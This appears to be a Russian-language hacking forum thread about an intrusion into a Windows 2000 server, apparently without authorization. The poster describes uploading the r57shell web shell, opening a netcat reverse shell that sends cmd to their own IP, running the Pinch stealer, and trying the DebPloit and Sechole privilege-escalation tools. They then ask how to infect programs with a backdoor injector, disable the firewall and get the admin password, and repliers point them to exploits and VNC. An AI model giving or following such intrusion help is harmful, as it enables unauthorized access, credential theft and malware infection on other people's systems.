Здраствуйте, Закачал шел на виндовый сервак (Microsoft Windows 2000 [Version 5.00.2195]), в шеле моно выполнять команды, ipconfig показал: Windows 2000 IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.1.104 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 я так понял сервак локальный.? закачал netcat у себя открыл консоль: c:\put_k_nc\nc.exe -l -p 4000 и там запустил nc.exe (мой IP) 4000 -e cmd покавырявшись оказалось что у меня мало прав. попробывал запустить DebPloit и нех.. недало, подскажите пожалуйста как поднять прова и че вообще моно сделать.
Если ты на него залез, то нет. ipconfig показывает настройки сетевых интерфейсов. Ищи уязвимые дем... эээ, сервисы. Возможно винда не патченная. elsenot.com - все публичные эксплойты/уязвимости и их описания. И с командной строкой в win работать неудобно, поставь GUI вроде VNC.
Почему нет??? я ж через php шел залез И вообще мне кажиется что это виртуалка, памяти на всем серваке 3 гега. Вот хочю попробывать BackDoor Injector v2.0 заразить блакнот, IE, и еще ченибуть. Ктонить работал с такой прогой??? Если да то ей моно через консль управлять??? И как удаленно Броузер и фаер. вырубить чтоб неругался на ее???
как можно было зайти на этот сервер, если ip у него 192.168.1.104? на чем-то другом порт на него прокинут?
я через сайт залил шел r57shell и зашел. а там дальше сначала пинча запустил, получил отчет пустой. Дальше nc запустил чтобы он ко мне приконектился.
Подскажите команду для Вин 2000 чтобы увидет список процессов. tasklist некатит для 2000 И команду чтобы убить процесс.
Тасклист есть только в WinXp Proff. На сколько я помню, в Win2000 процесс убивается командой kill(-f), а список процессов можно посмотреть командой TLIST(-t) По-моему. Вообщем не забудь про /?
А как моно добыть пароль админа ???? На серваке включено удаленое управление рабочим сталом и VNC . Продовал спомощю (- Sechole ) добавить нового пользователя и непрокатило, вылезла такая бодяга: ERROR: could not get the task list . для справки: - Sechole Эта программка как и описанная выше добавляет юзеров в локальную группу админов. Утилита модифицирует в оперативной памяти код вызова процедуры OpenProcess и это позволяет ей подключится к привилегирированному процессу, независимо от того, имеет ли она для этого соответствующие разрешения. После успешного подключения она работает так же как и описанная выше утилита, добавляя юзера в секту Админов.
